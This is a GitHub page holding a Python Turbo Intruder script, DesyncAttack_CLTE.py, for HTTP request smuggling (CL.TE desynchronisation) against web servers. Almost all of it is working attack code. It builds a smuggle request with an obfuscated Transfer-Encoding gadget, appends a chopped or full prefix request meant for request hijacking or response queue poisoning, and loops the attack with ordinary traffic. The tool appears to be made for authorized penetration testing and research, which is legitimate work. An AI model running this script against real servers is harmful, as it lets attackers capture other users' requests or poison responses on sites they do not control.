-
Notifications
You must be signed in to change notification settings - Fork 59
/
DesyncAttack_CLTE.py
189 lines (170 loc) · 8.39 KB
/
DesyncAttack_CLTE.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
# Copyright 2020 Evan Custodio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software
# and associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
# TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Turbo Intruder Python Script
# For HTTP Request Smuggling CLTE Attacks
#
# Author: @defparam
#
# Documentation:
#
# Server: IP address/dns name of the web server you want to connect to, http/https 80/443 supported.
# attack_count: The number of smuggle requests to issue.
# regular_count: The number of innocuous requests to issue out after the smuggle requests.
# continuous: Set to True if you want the attack request and regular requests to endlessly loop, False will break after first iteration.
# concurrentConnections: Request engine concurrent connection count.
# requestsPerConnection: Request engine requests per connection count.
#
# SmuggleGadget: Gadget used to induce CLTE desync on the asset.
# TheVerb: The HTTP method used in the first level smuggle request.
# TheEP: The endpoint used in the first level smuggle request.
# TheProtocol: The HTTP Protocol version used in the first level smuggle request.
# TheHost: The hostname used in the host header of the first level smuggle request.
#
# PrefixVerb: The HTTP method used in the second level prefix request.
# PrefixEP: The endpoint used in the second level prefix request.
# PrefixProtocol: The HTTP Protocol version used in the second level prefix request.
# PrefixHost: The hostname used in the host header of the second level prefix request (only if ChoppedHost is True or Chopped is False)
# Chopped(true): If True the prefix request is chopped at a custom header and is incomplete. This is used for request hijacking.
# Chopped(false): If False the prefix request is a fully formed HTTP request. This is used for response queue poisoning.
# ChoppedHost: If True the chopped prefix will contain a host header specified by PrefixHost.
#
# FilterOn(False): If False all responses shall be posted in the turbo intruder window.
# FilterOn(True): If True all NULL responses are omitted and all responses that match the Filters list shall be omitted.
# Filters(List): This is a list of strings that are compared against responses, if responses contain these string they shall be omitted (if FilterOn == True)
# ShowTestResponse: If True this debug feature allows the first response to appear unfiltered regardless if filtering is enabled
# --------------------------- #
# ----ATTACK PARAMETERS!----- #
# --------------------------- #
Server = "https://<example>.com:443"
attack_count = 1
regular_count = 40
continuous = False
concurrentConnections = 10
requestsPerConnection = 1
# --
# -- Smuggle Request Parameters
SmuggleGadget = "\x01Transfer-Encoding: chunked"
TheVerb = "POST"
TheEP = "/"
TheProtocol = "HTTP/1.1"
TheHost = "<example>.com"
# --
# -- Prefix Request Parameters
PrefixVerb = "GET"
PrefixEP = "/404"
PrefixProtocol = "HTTP/1.1"
PrefixHost = "<example>.com"
Chopped = True
ChoppedHost = False
# --
# -- Response Filtering Parameters
FilterOn = True
Filters = ["Content-Length: 1256","HTTP/1.1 400 Bad Request"]
ShowTestResponse = False
# --
# --------------------------- #
# --------------------------- #
# --------------------------- #
# --------------------------- #
# ------------------------------------------------- #
# If you make changes to the headers formats below
# try not to break the parameterization.
# ------------------------------------------------- #
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=Server,
concurrentConnections=concurrentConnections,
requestsPerConnection=requestsPerConnection,
resumeSSL=False,
timeout=1,
pipeline=False,
maxRetriesPerRequest=0,
engine=Engine.THREADED,
)
engine.start()
RN = "\r\n"
# --------------------------- #
# --CHOPPED PREFIX REQUEST!-- #
# --------------------------- #
prefix_chopped = ("%s %s HTTP/1.1" % (PrefixVerb, PrefixEP)) + RN
if (ChoppedHost): prefix_chopped += ("Host: %s" % (PrefixHost)) + RN
prefix_chopped += "X: X" # CHOP!
# --------------------------- #
# --------------------------- #
# ----FULL PREFIX REQUEST!--- #
# --------------------------- #
prefix_full = ("%s %s %s" % (PrefixVerb, PrefixEP, PrefixProtocol)) + RN
prefix_full += ("Host: %s" % (PrefixHost)) + RN
prefix_full += "Connection: keep-alive" + RN
prefix_full += "Accept-Encoding: gzip, deflate" + RN
prefix_full += "Accept: */*" + RN
prefix_full += "Accept-Language: en" + RN
prefix_full += "Content-Type: application/x-www-form-urlencoded" + RN
prefix_full += RN
# --------------------------- #
# --------------------------- #
# ---CLTE SMUGGLE REQUEST!--- #
# --------------------------- #
smuggle = ("%s %s %s" % (TheVerb, TheEP, TheProtocol)) + RN
smuggle += SmuggleGadget + RN # SMUGGLE GADGET!
smuggle += ("Host: %s" % (TheHost)) + RN
smuggle += "Content-Length: 0" + RN
smuggle += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" + RN
smuggle += "Origin: https://www.google.com" + RN
smuggle += "Accept-Encoding: gzip, deflate" + RN
smuggle += "Content-Type: application/x-www-form-urlencoded" + RN
smuggle += RN
smuggle += "0"
smuggle += RN
smuggle += RN
# --------------------------- #
# --------------------------- #
# -----REGULAR REQUEST!------ #
# --------------------------- #
regular = "GET / HTTP/1.1" + RN
regular += ("Host: %s" % (TheHost)) + RN
regular += "Origin: https://www.google.com" + RN
regular += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" + RN
regular += RN
# --------------------------- #
# --------------------------- #
# -----ATTACK EXECUTOR!------ #
# --------------------------- #
if (Chopped):
attack = smuggle + prefix_chopped
else:
attack = smuggle + prefix_full
while(1):
for i in range(attack_count): engine.queue(attack)
for i in range(regular_count): engine.queue(regular)
if (not continuous): break
# --------------------------- #
# --------------------------- #
# ----RESPONSE FILTERING!---- #
# --------------------------- #
def handleResponse(req, interesting):
global ShowTestResponse
if (FilterOn and not ShowTestResponse):
if len(req.response) == 4:
return
for filter in Filters:
if filter in req.response:
return
ShowTestResponse = False
table.add(req)
# --------------------------- #